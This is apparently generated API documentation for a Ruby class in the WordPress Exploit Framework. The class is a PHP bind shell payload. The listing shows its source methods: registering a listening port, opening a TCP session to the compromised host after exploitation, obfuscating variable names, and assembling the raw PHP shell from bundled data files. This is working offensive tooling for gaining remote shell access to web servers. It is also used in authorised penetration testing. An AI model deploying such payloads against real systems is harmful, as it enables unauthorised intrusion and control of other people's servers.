class Wpxf::Payloads::BindPhp

A PHP shell bound to an IPv4 address.

Attributes

host[RW]

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Options::new
# File lib/wpxf/payloads/bind_php.rb, line 13
def initialize
  super

  register_options([
    PortOption.new(
      name: 'lport',
      required: true,
      default: 1234,
      desc: 'The port being used to listen for incoming connections'
    )
  ])
end

Public Instance Methods

check(mod) click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 26
def check(mod)
  if mod.get_option('proxy')
    mod.emit_warning 'The proxy option for this module is only used for '\
                     'HTTP connections and will NOT be used for the TCP '\
                     'connection that the payload establishes'
  end
end
cleanup() click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 89
def cleanup
  self.queued_commands = []
end
connect_to_host(event_emitter) click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 42
def connect_to_host(event_emitter)
  event_emitter.emit_info "Connecting to #{host}:#{lport}..."
  socket = nil
  error = ''

  begin
    socket = TCPSocket.new(host, lport)
  rescue StandardError => e
    error = e
  end

  event_emitter.emit_error "Failed to connect to #{host}:#{lport} #{error}" unless socket
  socket
end
constants() click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 80
def constants
  { 'port' => lport }
end
lport() click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 34
def lport
  normalized_option_value('lport')
end
obfuscated_variables() click to toggle source
Calls superclass method Wpxf::Payload#obfuscated_variables
# File lib/wpxf/payloads/bind_php.rb, line 72
def obfuscated_variables
  super +
    [
      'cmd', 'disabled', 'output', 'handle', 'pipes', 'fp',
      'port', 'scl', 'sock', 'ret', 'msg_sock', 'r', 'w', 'e'
    ]
end
post_exploit(mod) click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 57
def post_exploit(mod)
  socket = connect_to_host(mod)
  return false unless socket

  Wpxf.change_stdout_sync(true) do
    mod.emit_success 'Established a session'
    start_socket_io_loop(socket, mod)
    socket.close
    puts
    mod.emit_info "Disconnected from #{host}:#{lport}"
  end

  true
end
prepare(mod) click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 38
def prepare(mod)
  self.host = mod.get_option_value('host')
end
raw() click to toggle source
# File lib/wpxf/payloads/bind_php.rb, line 84
def raw
  "#{DataFile.new('php', 'exec_methods.php').php_content}"\
  "#{DataFile.new('php', 'bind_php.php').php_content}"
end